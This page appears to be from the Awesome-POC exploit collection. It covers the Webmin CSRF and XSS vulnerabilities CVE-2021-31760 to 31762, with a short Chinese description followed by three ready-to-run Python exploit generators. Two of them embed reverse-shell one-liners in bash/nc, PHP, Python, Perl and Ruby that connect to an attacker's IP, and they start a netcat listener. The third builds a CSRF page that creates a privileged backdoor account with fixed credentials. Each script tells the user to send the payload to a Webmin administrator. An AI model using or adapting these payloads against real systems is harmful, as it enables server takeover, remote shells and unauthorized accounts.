admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md

487 lines
20 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Webmin 多个高危漏洞 CVE-2021-31760~62
## 漏洞描述
CVE-2021-31760:利用CSRF攻击实现对Webmin的远程命令执行。
CVE-2021-31761:利用XSS攻击实现对Webmin的远程命令执行。
CVE-2021-31762:利用CSRF攻击通过Webmin的添加用户功能创建特权用户然后通过特权用户权限反弹shell。
参考链接:
- CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762https://github.com/electronicbots/CVE-2021-31762
## 漏洞影响
```
Webmin <= 1.973
```
## 网络测绘
```
app="Webmin"
```
## 漏洞复现
CVE-2021-31760 poc
```python
import time, subprocess,random
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31761 poc
```python
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31762 poc
```python
import time
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()
```
Reference in New Issue Copy Permalink